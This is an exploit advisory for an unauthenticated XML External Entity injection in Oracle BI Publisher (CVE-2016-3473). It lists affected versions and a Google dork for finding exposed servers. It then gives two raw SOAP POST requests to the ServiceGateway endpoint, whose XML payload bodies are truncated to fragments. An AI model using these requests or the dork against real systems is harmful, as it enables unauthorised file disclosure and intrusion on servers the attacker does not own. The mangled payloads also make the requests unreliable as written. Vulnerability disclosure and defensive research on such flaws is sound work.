# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication # Date: 20\10\2016 # Exploit Author: Jakub Palaczynski # CVE : CVE-2016-3473 # Vendor Homepage: https://www.oracle.com/ # Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0 # Info: Previous versions may also be vulnerable. # Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login" 1. Vulnerable SOAP Action: replyToXML POST /xmlpserver/services/ServiceGateway HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: #replyToXML Host: vulnerablehost Content-Length: 630 %remote;]>]]> ------------------------------------------------ 2. Vulnerable SOAP Action: replyToXMLWithContext POST /xmlpserver/services/ServiceGateway HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: #replyToXMLWithContext Host: vulnerablehost Content-Length: 646 %remote;]>]]>